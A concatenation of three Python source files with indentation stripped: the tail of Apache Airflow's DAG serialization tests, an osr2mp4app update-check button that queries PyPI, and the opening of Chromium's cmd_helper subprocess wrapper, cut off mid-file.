dagbag = DagBag(module_path)
return dagbag.dags
def make_simple_dag():
"""Make very simple DAG to verify serialization result."""
with DAG(
dag_id='simple_dag',
default_args={
"retries": 1,
"retry_delay": timedelta(minutes=5),
"depends_on_past": False,
},
start_date=datetime(2019, 8, 1),
is_paused_upon_creation=False,
access_control={
"test_role": {"can_dag_read", "can_dag_edit"}
}
) as dag:
CustomOperator(task_id='custom_task')
BashOperator(task_id='bash_task', bash_command='echo {{ task.task_id }}', owner='airflow')
return {'simple_dag': dag}
def make_user_defined_macro_filter_dag():
""" Make DAGs with user defined macros and filters using locally defined methods.
For Webserver, we do not include ``user_defined_macros`` & ``user_defined_filters``.
The examples here test:
(1) functions can be successfully displayed on UI;
(2) templates with function macros have been rendered before serialization.
"""
def compute_next_execution_date(dag, execution_date):
return dag.following_schedule(execution_date)
default_args = {
'start_date': datetime(2019, 7, 10)
}
dag = DAG(
'user_defined_macro_filter_dag',
default_args=default_args,
user_defined_macros={
'next_execution_date': compute_next_execution_date,
},
user_defined_filters={
'hello': lambda name: 'Hello %s' % name
},
catchup=False
)
BashOperator(
task_id='echo',
bash_command='echo "{{ next_execution_date(dag, execution_date) }}"',
dag=dag,
)
return {dag.dag_id: dag}
def collect_dags(dag_folder=None):
"""Collects DAGs to test."""
dags = {}
dags.update(make_simple_dag())
dags.update(make_user_defined_macro_filter_dag())
if dag_folder:
if isinstance(dag_folder, (list, tuple)):
patterns = dag_folder
else:
patterns = [dag_folder]
else:
patterns = [
"airflow/example_dags",
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
for pattern in patterns:
for directory in glob(f"{ROOT_FOLDER}/{pattern}"):
dags.update(make_example_dags(directory))
# Filter subdags as they are stored in same row in Serialized Dag table
dags = {dag_id: dag for dag_id, dag in dags.items() if not dag.is_subdag}
return dags
def serialize_subprocess(queue, dag_folder):
"""Validate pickle in a subprocess."""
dags = collect_dags(dag_folder)
for dag in dags.values():
queue.put(SerializedDAG.to_json(dag))
queue.put(None)
class TestStringifiedDAGs(unittest.TestCase):
"""Unit tests for stringified DAGs."""
def setUp(self):
super().setUp()
BaseHook.get_connection = mock.Mock(
return_value=Connection(
extra=('{'
'"project_id": "mock", '
'"location": "mock", '
'"instance": "mock", '
'"database_type": "postgres", '
'"use_proxy": "False", '
'"use_ssl": "False"'
'}')))
self.maxDiff = None # pylint: disable=invalid-name
def test_serialization(self):
"""Serialization and deserialization should work for every DAG and Operator."""
dags = collect_dags()
serialized_dags = {}
for _, v in dags.items():
dag = SerializedDAG.to_dict(v)
SerializedDAG.validate_schema(dag)
serialized_dags[v.dag_id] = dag
# Compares with the ground truth of JSON string.
self.validate_serialized_dag(
serialized_dags['simple_dag'],
serialized_simple_dag_ground_truth)
def validate_serialized_dag(self, json_dag, ground_truth_dag):
"""Verify serialized DAGs match the ground truth."""
self.assertTrue(
json_dag['dag']['fileloc'].split('/')[-1] == 'test_dag_serialization.py')
json_dag['dag']['fileloc'] = None
def sorted_serialized_dag(dag_dict: dict):
"""
Sorts the "tasks" list and "access_control" permissions in the
serialised dag python dictionary. This is needed as the order of
items should not matter but assertEqual would fail if the order of
items changes in the dag dictionary
"""
dag_dict["dag"]["tasks"] = sorted(dag_dict["dag"]["tasks"],
key=lambda x: sorted(x.keys()))
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] = sorted(
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"]
)
return dag_dict
assert sorted_serialized_dag(ground_truth_dag) == sorted_serialized_dag(json_dag)
def test_deserialization_across_process(self):
"""A serialized DAG can be deserialized in another process."""
# Since we need to parse the dags twice here (once in the subprocess,
# and once here to get a DAG to compare to) we don't want to load all
# dags.
queue = multiprocessing.Queue()
proc = multiprocessing.Process(
target=serialize_subprocess, args=(queue, "airflow/example_dags"))
proc.daemon = True
proc.start()
stringified_dags = {}
while True:
v = queue.get()
if v is None:
break
dag = SerializedDAG.from_json(v)
self.assertTrue(isinstance(dag, DAG))
stringified_dags[dag.dag_id] = dag
dags = collect_dags("airflow/example_dags")
assert set(stringified_dags.keys()) == set(dags.keys())
# Verify deserialized DAGs.
for dag_id in stringified_dags:
self.validate_deserialized_dag(stringified_dags[dag_id], dags[dag_id])
def test_roundtrip_provider_example_dags(self):
dags = collect_dags([
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
])
# Verify deserialized DAGs.
for dag in dags.values():
serialized_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(serialized_dag, dag)
def validate_deserialized_dag(self, serialized_dag, dag):
"""
Verify that all example DAGs work with DAG Serialization by
checking fields between Serialized Dags & non-Serialized Dags
"""
fields_to_check = dag.get_serialized_fields() - {
# Doesn't implement __eq__ properly. Check manually
'timezone',
# Need to check fields in it, to exclude functions
'default_args',
}
for field in fields_to_check:
assert getattr(serialized_dag, field) == getattr(dag, field), \
f'{dag.dag_id}.{field} does not match'
if dag.default_args:
for k, v in dag.default_args.items():
if callable(v):
# Check we stored _something_.
assert k in serialized_dag.default_args
else:
assert v == serialized_dag.default_args[k], \
f'{dag.dag_id}.default_args[{k}] does not match'
assert serialized_dag.timezone.name == dag.timezone.name
for task_id in dag.task_ids:
self.validate_deserialized_task(serialized_dag.get_task(task_id), dag.get_task(task_id))
# Verify that the DAG object has 'full_filepath' attribute
# and is equal to fileloc
assert serialized_dag.full_filepath == dag.fileloc
def validate_deserialized_task(self, serialized_task, task,):
"""Verify non-airflow operators are casted to BaseOperator."""
assert isinstance(serialized_task, SerializedBaseOperator)
assert not isinstance(task, SerializedBaseOperator)
assert isinstance(task, BaseOperator)
fields_to_check = task.get_serialized_fields() - {
# Checked separately
'_task_type', 'subdag',
# Type is excluded, so don't check it
'_log',
# List vs tuple. Check separately
'template_fields',
# We store the string, real dag has the actual code
'on_failure_callback', 'on_success_callback', 'on_retry_callback',
# Checked separately
'resources',
}
assert serialized_task.task_type == task.task_type
assert set(serialized_task.template_fields) == set(task.template_fields)
assert serialized_task.upstream_task_ids == task.upstream_task_ids
assert serialized_task.downstream_task_ids == task.downstream_task_ids
for field in fields_to_check:
assert getattr(serialized_task, field) == getattr(task, field), \
f'{task.dag.dag_id}.{task.task_id}.{field} does not match'
if serialized_task.resources is None:
assert task.resources is None or task.resources == []
else:
assert serialized_task.resources == task.resources
# Check that for Deserialised task, task.subdag is None for all other Operators
# except for the SubDagOperator where task.subdag is an instance of DAG object
if task.task_type == "SubDagOperator":
assert serialized_task.subdag is not None
assert isinstance(serialized_task.subdag, DAG)
else:
assert serialized_task.subdag is None
@parameterized.expand([
(datetime(2019, 8, 1), None, datetime(2019, 8, 1)),
(datetime(2019, 8, 1), datetime(2019, 8, 2), datetime(2019, 8, 2)),
(datetime(2019, 8, 1), datetime(2019, 7, 30), datetime(2019, 8, 1)),
])
def test_deserialization_start_date(self,
dag_start_date,
task_start_date,
expected_task_start_date):
dag = DAG(dag_id='simple_dag', start_date=dag_start_date)
BaseOperator(task_id='simple_task', dag=dag, start_date=task_start_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_start_date or dag_start_date >= task_start_date:
# If dag.start_date > task.start_date -> task.start_date=dag.start_date
# because of the logic in dag.add_task()
self.assertNotIn("start_date", serialized_dag["dag"]["tasks"][0])
else:
self.assertIn("start_date", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(simple_task.start_date, expected_task_start_date)
@parameterized.expand([
(datetime(2019, 8, 1), None, datetime(2019, 8, 1)),
(datetime(2019, 8, 1), datetime(2019, 8, 2), datetime(2019, 8, 1)),
(datetime(2019, 8, 1), datetime(2019, 7, 30), datetime(2019, 7, 30)),
])
def test_deserialization_end_date(self,
dag_end_date,
task_end_date,
expected_task_end_date):
dag = DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1),
end_date=dag_end_date)
BaseOperator(task_id='simple_task', dag=dag, end_date=task_end_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_end_date or dag_end_date <= task_end_date:
# If dag.end_date < task.end_date -> task.end_date=dag.end_date
# because of the logic in dag.add_task()
self.assertNotIn("end_date", serialized_dag["dag"]["tasks"][0])
else:
self.assertIn("end_date", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(simple_task.end_date, expected_task_end_date)
@parameterized.expand([
(None, None, None),
("@weekly", "@weekly", "0 0 * * 0"),
("@once", "@once", None),
({"__type": "timedelta", "__var": 86400.0}, timedelta(days=1), timedelta(days=1)),
])
def test_deserialization_schedule_interval(
self, serialized_schedule_interval, expected_schedule_interval, expected_n_schedule_interval
):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"schedule_interval": serialized_schedule_interval,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
self.assertEqual(dag.schedule_interval, expected_schedule_interval)
self.assertEqual(dag.normalized_schedule_interval, expected_n_schedule_interval)
@parameterized.expand([
(relativedelta(days=-1), {"__type": "relativedelta", "__var": {"days": -1}}),
(relativedelta(month=1, days=-1), {"__type": "relativedelta", "__var": {"month": 1, "days": -1}}),
# Every friday
(relativedelta(weekday=FR), {"__type": "relativedelta", "__var": {"weekday": [4]}}),
# Every second friday
(relativedelta(weekday=FR(2)), {"__type": "relativedelta", "__var": {"weekday": [4, 2]}})
])
def test_roundtrip_relativedelta(self, val, expected):
serialized = SerializedDAG._serialize(val)
self.assertDictEqual(serialized, expected)
round_tripped = SerializedDAG._deserialize(serialized)
self.assertEqual(val, round_tripped)
@parameterized.expand([
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
])
def test_dag_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag', params=val)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
self.assertIn("params", serialized_dag["dag"])
else:
self.assertNotIn("params", serialized_dag["dag"])
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
self.assertEqual(expected_val, deserialized_dag.params)
self.assertEqual(expected_val, deserialized_simple_task.params)
@parameterized.expand([
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
])
def test_task_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag')
BaseOperator(task_id='simple_task', dag=dag, params=val,
start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
self.assertIn("params", serialized_dag["dag"]["tasks"][0])
else:
self.assertNotIn("params", serialized_dag["dag"]["tasks"][0])
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
self.assertEqual(expected_val, deserialized_simple_task.params)
def test_extra_serialized_field_and_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command="true")
serialized_dag = SerializedDAG.to_dict(dag)
self.assertIn("bash_command", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(getattr(simple_task, "bash_command"), "true")
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
self.assertEqual(
serialized_dag["dag"]["tasks"][0]["_operator_extra_links"],
[{'tests.test_utils.mock_operators.CustomOpLink': {}}]
)
# Test all the extra_links are set
self.assertCountEqual(simple_task.extra_links, ['Google Custom', 'airflow', 'github', 'google'])
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', "dummy_value_1")
# Test Deserialized inbuilt link
custom_inbuilt_link = simple_task.get_extra_links(test_date, CustomOpLink.name)
self.assertEqual('http://google.com/custom_base_link?search=dummy_value_1', custom_inbuilt_link)
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
self.assertEqual("https://www.google.com", google_link_from_plugin)
def test_extra_serialized_field_and_multiple_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command=["echo", "true"])
serialized_dag = SerializedDAG.to_dict(dag)
self.assertIn("bash_command", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(getattr(simple_task, "bash_command"), ["echo", "true"])
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
self.assertEqual(
serialized_dag["dag"]["tasks"][0]["_operator_extra_links"],
[
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 0}},
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 1}},
]
)
# Test all the extra_links are set
self.assertCountEqual(simple_task.extra_links, [
'BigQuery Console #1', 'BigQuery Console #2', 'airflow', 'github', 'google'])
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', ["dummy_value_1", "dummy_value_2"])
# Test Deserialized inbuilt link #1
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #1")
self.assertEqual('https://console.cloud.google.com/bigquery?j=dummy_value_1', custom_inbuilt_link)
# Test Deserialized inbuilt link #2
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #2")
self.assertEqual('https://console.cloud.google.com/bigquery?j=dummy_value_2', custom_inbuilt_link)
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
self.assertEqual("https://www.google.com", google_link_from_plugin)
class ClassWithCustomAttributes:
"""
Class for testing purposes: allows creating objects with custom attributes in a single statement.
"""
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return "{}({})".format(self.__class__.__name__, str(self.__dict__))
def __repr__(self):
return self.__str__()
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
@parameterized.expand([
(None, None),
([], []),
({}, {}),
("{{ task.task_id }}", "{{ task.task_id }}"),
(["{{ task.task_id }}", "{{ task.task_id }}"]),
({"foo": "{{ task.task_id }}"}, {"foo": "{{ task.task_id }}"}),
({"foo": {"bar": "{{ task.task_id }}"}}, {"foo": {"bar": "{{ task.task_id }}"}}),
(
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
),
(
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}}),
(
ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]),
"ClassWithCustomAttributes("
"{'att1': '{{ task.task_id }}', 'att2': '{{ task.task_id }}', 'template_fields': ['att1']})",
),
(
ClassWithCustomAttributes(nested1=ClassWithCustomAttributes(att1="{{ task.task_id }}",
att2="{{ task.task_id }}",
template_fields=["att1"]),
nested2=ClassWithCustomAttributes(att3="{{ task.task_id }}",
att4="{{ task.task_id }}",
template_fields=["att3"]),
template_fields=["nested1"]),
"ClassWithCustomAttributes("
"{'nested1': ClassWithCustomAttributes({'att1': '{{ task.task_id }}', "
"'att2': '{{ task.task_id }}', 'template_fields': ['att1']}), "
"'nested2': ClassWithCustomAttributes({'att3': '{{ task.task_id }}', "
"'att4': '{{ task.task_id }}', 'template_fields': ['att3']}), 'template_fields': ['nested1']})",
),
])
def test_templated_fields_exist_in_serialized_dag(self, templated_field, expected_field):
"""
Test that templated_fields exists for all Operators in Serialized DAG
Since we don't want to inflate arbitrary python objects (it poses an RCE/security risk etc.)
we want to check that non-"basic" objects are turned into strings after deserialization.
"""
dag = DAG("test_serialized_template_fields", start_date=datetime(2019, 8, 1))
with dag:
BashOperator(task_id="test", bash_command=templated_field)
serialized_dag = SerializedDAG.to_dict(dag)
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_test_task = deserialized_dag.task_dict["test"]
self.assertEqual(expected_field, getattr(deserialized_test_task, "bash_command"))
def test_dag_serialized_fields_with_schema(self):
"""
Additional Properties are disabled on DAGs. This test verifies that all the
keys in DAG.get_serialized_fields are listed in Schema definition.
"""
dag_schema: dict = load_dag_schema_dict()["definitions"]["dag"]["properties"]
# The parameters we add manually in Serialization needs to be ignored
ignored_keys: set = {"is_subdag", "tasks"}
dag_params: set = set(dag_schema.keys()) - ignored_keys
self.assertEqual(set(DAG.get_serialized_fields()), dag_params)
def test_operator_subclass_changing_base_defaults(self):
assert BaseOperator(task_id='dummy').do_xcom_push is True, \
"Precondition check! If this fails the test won't make sense"
class MyOperator(BaseOperator):
def __init__(self, do_xcom_push=False, **kwargs):
super().__init__(**kwargs)
self.do_xcom_push = do_xcom_push
op = MyOperator(task_id='dummy')
assert op.do_xcom_push is False
blob = SerializedBaseOperator.serialize_operator(op)
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert serialized_op.do_xcom_push is False
def test_no_new_fields_added_to_base_operator(self):
"""
This test verifies that no new fields have been added to BaseOperator, and serves as a
reminder that tests should be added for any new field.
"""
base_operator = BaseOperator(task_id="10")
fields = base_operator.__dict__
self.assertEqual({'_dag': None,
'_downstream_task_ids': set(),
'_inlets': [],
'_log': base_operator.log,
'_outlets': [],
'_upstream_task_ids': set(),
'depends_on_past': False,
'do_xcom_push': True,
'email': None,
'email_on_failure': True,
'email_on_retry': True,
'end_date': None,
'execution_timeout': None,
'executor_config': {},
'inlets': [],
'max_retry_delay': None,
'on_execute_callback': None,
'on_failure_callback': None,
'on_retry_callback': None,
'on_success_callback': None,
'outlets': [],
'owner': 'airflow',
'params': {},
'pool': 'default_pool',
'pool_slots': 1,
'priority_weight': 1,
'queue': 'default',
'resources': None,
'retries': 0,
'retry_delay': timedelta(0, 300),
'retry_exponential_backoff': False,
'run_as_user': None,
'sla': None,
'start_date': None,
'subdag': None,
'task_concurrency': None,
'task_id': '10',
'trigger_rule': 'all_success',
'wait_for_downstream': False,
'weight_rule': 'downstream'}, fields,
"""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ACTION NEEDED! PLEASE READ THIS CAREFULLY AND CORRECT TESTS CAREFULLY
Some fields were added to the BaseOperator! Please add them to the list above and make sure that
you add support for DAG serialization - you should add the field to
`airflow/serialization/schema.json` - they should have correct type defined there.
Note that we do not support versioning yet so you should only add optional fields to BaseOperator.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
"""
)
|
UpdateButton.py
|
import os
import sys
from PyQt5.QtWidgets import QLabel
import logging
from Parents import Button
import pkg_resources
import json
import sys
from urllib import request
from pkg_resources import parse_version
import threading
class UpdateButton(Button):
def __init__(self, parent):
super(UpdateButton, self).__init__(parent)
self.main_window = parent
self.osr2mp4_current_ver = pkg_resources.get_distribution("osr2mp4").version
self.osr2mp4app_current_ver = pkg_resources.get_distribution("osr2mp4app").version
x = threading.Thread(target=self.check_updates)
x.start()
self.default_x = 20
self.default_y = 450
self.default_size = 0.75
self.text_x = 500
self.text_y = -10
self.default_fontsize = 250
self.img_idle = "res/update_btn.png"
self.img_hover = "res/update_btn_hover.png"
self.img_click = "res/update_btn_click.png"
super().setup()
self.text = QLabel(self)
self.text.setToolTip("{} | {}".format(self.osr2mp4_current_ver, self.osr2mp4app_current_ver))
logging.info("{} | {}".format(self.osr2mp4_current_ver, self.osr2mp4app_current_ver))
self.hide()
def mouseclicked(self):
# proc = subprocess.Popen([sys.executable, "updater.py"])
fupdate = open(os.path.join(self.main_window.execpath, "exit.txt"), "w")
fupdate.write("1")
fupdate.close()
sys.exit(0)
def changesize(self):
super().changesize()
scale = self.height()/self.main_window.default_height
x = scale * self.text_x
y = scale * self.text_y
fontsize = scale * self.default_fontsize
self.text.setStyleSheet("QLabel{font-size: %ipt; font-weight: bold; color: white; background-color: transparent;}QToolTip { background-color:white;color: black; }" % fontsize)
self.text.setGeometry(int(x), int(y), self.width(), self.height())
def check_updates(self):
osr2mp4_latest_ver = get_version('osr2mp4')
osr2mp4app_latest_ver = get_version('osr2mp4app')
logging.info("Latest Version of osr2mp4: {}".format(osr2mp4_latest_ver[0]))
logging.info("Latest Version of osr2mp4app: {}".format(osr2mp4app_latest_ver[0]))
logging.info("Current Version of osr2mp4: {}".format(self.osr2mp4_current_ver))
logging.info("Current Version of osr2mp4app: {}".format(self.osr2mp4app_current_ver))
if self.osr2mp4_current_ver == osr2mp4_latest_ver[0] and self.osr2mp4app_current_ver == osr2mp4app_latest_ver[0]:
print("Updated")
self.hide()
else:
print("Outdated")
self.show()
def get_version(pkg_name):
url = f'https://pypi.python.org/pypi/{pkg_name}/json'
releases = json.loads(request.urlopen(url).read())['releases']
return sorted(releases, key=parse_version, reverse=True)
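# Hedged usage sketch (not part of the original file): get_version returns the
# release strings from the PyPI JSON API sorted newest-first, so element [0] is
# the latest version, which is how check_updates above consumes it.
#   versions = get_version('osr2mp4')  # e.g. ['0.0.8', '0.0.7', ...] (hypothetical values)
#   latest = versions[0]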
|
cmd_helper.py
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A wrapper for subprocess to make calling shell commands easier."""
import logging
import os
import pipes
import select
import signal
import string
import StringIO
import subprocess
import sys
import time
logger = logging.getLogger(__name__)
_SafeShellChars = frozenset(string.ascii_letters + string.digits + '@%_-+=:,./')
def SingleQuote(s):
"""Return an shell-escaped version of the string using single quotes.
Reliably quote a string which may contain unsafe characters (e.g. space,
quote, or other special characters such as '$').
The returned value can be used in a shell command line as one token that gets
to be interpreted literally.
Args:
s: The string to quote.
Returns:
The string quoted using single quotes.
"""
return pipes.quote(s)
def DoubleQuote(s):
"""Return an shell-escaped version of the string using double quotes.
Reliably quote a string which may contain unsafe characters (e.g. space
or quote characters), while retaining some shell features such as variable
interpolation.
The returned value can be used in a shell command line as one token that gets
to be further interpreted by the shell.
The set of characters that retain their special meaning may depend on the
shell implementation. This set usually includes: '$', '`', '\', '!', '*',
and '@'.
Args:
s: The string to quote.
Returns:
The string quoted using double quotes.
"""
if not s:
return '""'
elif all(c in _SafeShellChars for c in s):
return s
else:
return '"' + s.replace('"', '\\"') + '"'
def ShrinkToSnippet(cmd_parts, var_name, var_value):
"""Constructs a shell snippet for a command using a variable to shrink it.
Takes into account all quoting that needs to happen.
Args:
cmd_parts: A list of command arguments.
var_name: The variable that holds var_value.
var_value: The string to replace in cmd_parts with $var_name
Returns:
A shell snippet that does not include setting the variable.
"""
def shrink(value):
parts = (x and SingleQuote(x) for x in value.split(var_value))
with_substitutions = ('"$%s"' % var_name).join(parts)
return with_substitutions or "''"
return ' '.join(shrink(part) for part in cmd_parts)
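# Illustrative example (hypothetical values, not from the original file):
# replacing a literal device serial with a variable reference shrinks the
# snippet while preserving quoting.
#   ShrinkToSnippet(['adb', '-s', '0123456789', 'shell'], 'SERIAL', '0123456789')
#   # -> 'adb -s "$SERIAL" shell'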
def Popen(args, stdout=None, stderr=None, shell=None, cwd=None, env=None):
# preexec_fn isn't supported on windows.
if sys.platform == 'win32':
close_fds = (stdout is None and stderr is None)
preexec_fn = None
else:
close_fds = True
preexec_fn = lambda: signal.signal(signal.SIGPIPE, signal.SIG_DFL)
return subprocess.Popen(
args=args, cwd=cwd, stdout=stdout, stderr=stderr,
shell=shell, close_fds=close_fds, env=env, preexec_fn=preexec_fn)
def Call(args, stdout=None, stderr=None, shell=None, cwd=None, env=None):
pipe = Popen(args, stdout=stdout, stderr=stderr, shell=shell, cwd=cwd,
env=env)
pipe.communicate()
return pipe.wait()
def RunCmd(args, cwd=None):
"""Opens a subprocess to execute a program and returns its return value.
Args:
args: A string or a sequence of program arguments. The program to execute is
the string or the first item in the args sequence.
cwd: If not None, the subprocess's current directory will be changed to
|cwd| before it's executed.
Returns:
Return code from the command execution.
"""
logger.info(str(args) + ' ' + (cwd or ''))
return Call(args, cwd=cwd)
def GetCmdOutput(args, cwd=None, shell=False, env=None):
"""Open a subprocess to execute a program and returns its output.
Args:
args: A string or a sequence of program arguments. The program to execute is
the string or the first item in the args sequence.
cwd: If not None, the subprocess's current directory will be changed to
|cwd| before it's executed.
shell: Whether to execute args as a shell command.
env: If not None, a mapping that defines environment variables for the
subprocess.
Returns:
Captures and returns the command's stdout.
Prints the command's stderr to logger (which defaults to stdout).
"""
(_, output) = GetCmdStatusAndOutput(args, cwd, shell, env)
return output
def _ValidateAndLogCommand(args, cwd, shell):
if isinstance(args, basestring):
if not shell:
raise Exception('string args must be run with shell=True')
else:
if shell:
raise Exception('array args must be run with shell=False')
args = ' '.join(SingleQuote(str(c)) for c in args)
if cwd is None:
cwd = ''
else:
cwd = ':' + cwd
logger.info('[host]%s> %s', cwd, args)
return args
def GetCmdStatusAndOutput(args, cwd=None, shell=False, env=None):
"""Executes a subprocess and returns its exit code and output.
Args:
args: A string or a sequence of program arguments. The program to execute is
the string or the first item in the args sequence.
cwd: If not None, the subprocess's current directory will be changed to
|cwd| before it's executed.
shell: Whether to execute args as a shell command. Must be True if args
is a string and False if args is a sequence.
env: If not None, a mapping that defines environment variables for the
subprocess.
Returns:
The 2-tuple (exit code, stdout).
"""
status, stdout, stderr = GetCmdStatusOutputAndError(
args, cwd=cwd, shell=shell, env=env)
if stderr:
logger.critical('STDERR: %s', stderr)
logger.debug('STDOUT: %s%s', stdout[:4096].rstrip(),
'<truncated>' if len(stdout) > 4096 else '')
return (status, stdout)
def StartCmd(args, cwd=None, shell=False, env=None):
"""Starts a subprocess and returns a handle to the process.
Args:
args: A string or a sequence of program arguments. The program to execute is
the string or the first item in the args sequence.
cwd: If not None, the subprocess's current directory will be changed to
|cwd| before it's executed.
shell: Whether to execute args as a shell command. Must be True if args
is a string and False if args is a sequence.
env: If not None, a mapping that defines environment variables for the
subprocess.
Returns:
A process handle from subprocess.Popen.
"""
_ValidateAndLogCommand(args, cwd, shell)
return Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=shell, cwd=cwd, env=env)
def GetCmdStatusOutputAndError(args, cwd=None, shell=False, env=None):
"""Executes a subprocess and returns its exit code, output, and errors.
Args:
args: A string or a sequence of program arguments. The program to execute is
the string or the first item in the args sequence.
cwd: If not None, the subprocess's current directory will be changed to
|cwd| before it's executed.
shell: Whether to execute args as a shell command. Must be True if args
is a string and False if args is a sequence.
env: If not None, a mapping that defines environment variables for the
subprocess.
Returns:
The 3-tuple (exit code, stdout, stderr).
"""
_ValidateAndLogCommand(args, cwd, shell)
pipe = Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=shell, cwd=cwd, env=env)
stdout, stderr = pipe.communicate()
return (pipe.returncode, stdout, stderr)
class TimeoutError(Exception):
"""Module-specific timeout exception."""
def __init__(self, output=None):
super(TimeoutError, self).__init__()
self._output = output
@property
def output(self):
return self._output
def _IterProcessStdoutFcntl(
process, iter_timeout=None, timeout=None, buffer_size=4096,
poll_interval=1):
"""An fcntl-based implementation of _IterProcessStdout."""
# pylint: disable=too-many-nested-blocks
import fcntl
try:
# Enable non-blocking reads from the child's stdout.
child_fd = process.stdout.fileno()
fl = fcntl.fcntl(child_fd, fcntl.F_GETFL)
fcntl.fcntl(child_fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
end_time = (time.time() + timeout) if timeout else None
iter_end_time = (time.time() + iter_timeout) if iter_timeout else None
while True:
if end_time and time.time() > end_time:
raise TimeoutError()
if iter_end_time and time.time() > iter_end_time:
yield None
iter_end_time = time.time() + iter_timeout
if iter_end_time:
iter_aware_poll_interval = min(
poll_interval,
max(0, iter_end_time - time.time()))
else:
iter_aware_poll_interval = poll_interval
read_fds, _, _ = select.select(
[child_fd], [], [], iter_aware_poll_interval)
if child_fd in read_fds:
data = os.read(child_fd, buffer_size)
if not data:
break
yield data
if process.poll() is not None:
# If process is closed, keep checking for output data (because of timing
# issues).
while True:
read_fds, _, _ = select.select(
[child_fd], [], [], iter_aware_poll_interval)
if child_fd in read_fds:
data = os.read(child_fd, buffer_size)
if data:
yield data
continue
break
break
finally:
try:
if process.returncode is None:
# Make sure the process doesn't stick around if we fail with an
# exception.
process.kill()
except OSError:
pass
process.wait()
def _IterProcessStdoutQueue(
process, iter_timeout=None, timeout=None, buffer_size=4096,
poll_interval=1):
